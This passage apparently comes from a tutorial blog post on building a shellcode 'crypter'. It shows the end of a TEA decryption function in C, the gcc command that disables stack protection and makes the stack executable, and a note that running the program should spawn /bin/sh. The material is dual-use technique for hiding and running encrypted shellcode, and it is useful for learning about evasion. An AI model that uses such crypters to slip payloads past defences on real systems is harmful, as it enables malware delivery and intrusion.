	uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i; /* set up */
	uint32_t delta=0x9e3779b9; /* a key schedule constant */
	uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */
	for (i=0; i<32; i++) { /* basic cycle start */
	v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
	v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
	sum -= delta;
	} /* end cycle */
	v[0]=v0; v[1]=v1;
	}

view raw TEAExecuteshellcode.c hosted with ❤ by GitHub

As usual we compile and run it. "gcc -fno-stack-protector -z execstack TEAExecuteShellcode.c -o TEAExecuteShellcode" Run the shellcode through objdump to make sure it has no nulls and then run the shellcode "./TEAExecuteshellcode". This should give us the /bin/sh shell which means our crypter is working.